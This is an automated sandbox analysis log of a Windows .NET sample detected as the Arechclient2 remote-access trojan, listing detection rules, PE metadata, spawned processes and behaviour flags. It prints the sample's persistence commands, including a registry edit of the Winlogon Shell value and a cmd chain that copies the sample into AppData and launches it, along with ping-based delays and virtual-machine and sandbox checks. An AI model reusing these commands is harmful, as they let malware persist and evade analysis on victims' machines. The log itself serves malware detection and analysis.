                Source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeCode function: 0_2_00991328
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeCode function: 0_2_00FE7408
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeCode function: 0_2_00FE7B51
                Source: atpRyiZGTE.exe, 00000000.00000002.444211680.000000000120C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecw.exeF vs atpRyiZGTE.exe
                Source: atpRyiZGTE.exe, 00000000.00000002.447907797.0000000003EF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNeWUsakdjfnsd.dll< vs atpRyiZGTE.exe
                Source: atpRyiZGTE.exe, 00000000.00000002.453220816.0000000006B00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNeWUsakdjfnsd.dll< vs atpRyiZGTE.exe
                Source: atpRyiZGTE.exe, 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTest.exe" vs atpRyiZGTE.exe
                Source: atpRyiZGTE.exe, 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTest.exe" vs atpRyiZGTE.exe
                Source: atpRyiZGTE.exeBinary or memory string: OriginalFilenamecw.exeF vs atpRyiZGTE.exe
                Source: atpRyiZGTE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: atpRyiZGTE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: atpRyiZGTE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: atpRyiZGTE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: atpRyiZGTE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: atpRyiZGTE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: atpRyiZGTE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: atpRyiZGTE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: atpRyiZGTE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: LightKeeperService.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: LightKeeperService.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: LightKeeperService.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: LightKeeperService.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: LightKeeperService.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: LightKeeperService.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: LightKeeperService.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: LightKeeperService.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: LightKeeperService.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                Source: atpRyiZGTE.exeReversingLabs: Detection: 42%
                Source: atpRyiZGTE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\atpRyiZGTE.exe "C:\Users\user\Desktop\atpRyiZGTE.exe"
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\atpRyiZGTE.exe.logJump to behavior
                Source: classification engineClassification label: mal96.troj.evad.winEXE@15/5@1/3
                Source: atpRyiZGTE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_01
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: atpRyiZGTE.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: atpRyiZGTE.exeStatic file information: File size 1598976 > 1048576
                Source: atpRyiZGTE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: atpRyiZGTE.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x168600
                Source: atpRyiZGTE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeCode function: 0_2_009921CD push FFFFFF8Bh; iretd
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeCode function: 0_2_00FE8355 push eax; retf 5502h
                Source: atpRyiZGTE.exe, Bo6/a8C.csHigh entropy of concatenated method names: '.ctor', 'Ki3', 'p4J', 'Nz0', 'Bt6', 'Mk3', 'Si9', 'Wp6', 'd8B', 'Wk7'
                Source: atpRyiZGTE.exe, w0XGc7/Mr7n6D.csHigh entropy of concatenated method names: '.ctor', 'f9WBp6', 'Gf13Tw', 'Qj28Bz', 'y1Y8Ri', 'r3E1Tx', 'Hi39Fa', 'Cf89Kt', 'w5P8Kp', 'f3JEb0'
                Source: atpRyiZGTE.exe, Kj87Xi/Xn05Ce.csHigh entropy of concatenated method names: '.ctor', 'q0M8Ss', 'x0Q5Wf', 'No60Js', 'Lr01Db', 'q5DSj2', 'Ci8o1H', 'x3K4Lj', 'y5QEj4', 'Kk68Yd'
                Source: atpRyiZGTE.exe, Dp4o9T/Sy50Xx.csHigh entropy of concatenated method names: '.ctor', 'j4FLp8', 'Ho3s2F', 'd3J2Be', 'Bt6z9M', 'g1MZw6', 'As86Wi', 'Ww52Sr', 'Cs51Ki', 'x6QJj2'
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\LightKeeperService.exeJump to dropped file

                Boot Survival

                barindex
                Creates an undocumented autostart registry key
                Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeFile opened: C:\Users\user\Desktop\atpRyiZGTE.exe\:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Uses ping.exe to sleep
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe TID: 6756Thread sleep time: -28592453314249787s >= -30000s
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe TID: 6756Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6796Thread sleep count: 37 > 30
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6796Thread sleep time: -37000s >= -30000s
                Source: C:\Windows\SysWOW64\PING.EXE TID: 4284Thread sleep count: 44 > 30
                Source: C:\Windows\SysWOW64\PING.EXE TID: 4284Thread sleep time: -44000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeWindow / User API: threadDelayed 4246
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeWindow / User API: threadDelayed 5455
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeThread delayed: delay time: 30000
                Source: atpRyiZGTE.exe, 00000000.00000002.445231000.0000000002EE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware VGAuth
                Source: atpRyiZGTE.exe, 00000000.00000002.445231000.0000000002EE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: sandboxierpcss#SOFTWARE\VMware, Inc.\VMware VGAuth
                Source: atpRyiZGTE.exe, 00000000.00000002.445231000.0000000002EE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray6
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Users\user\Desktop\atpRyiZGTE.exe VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
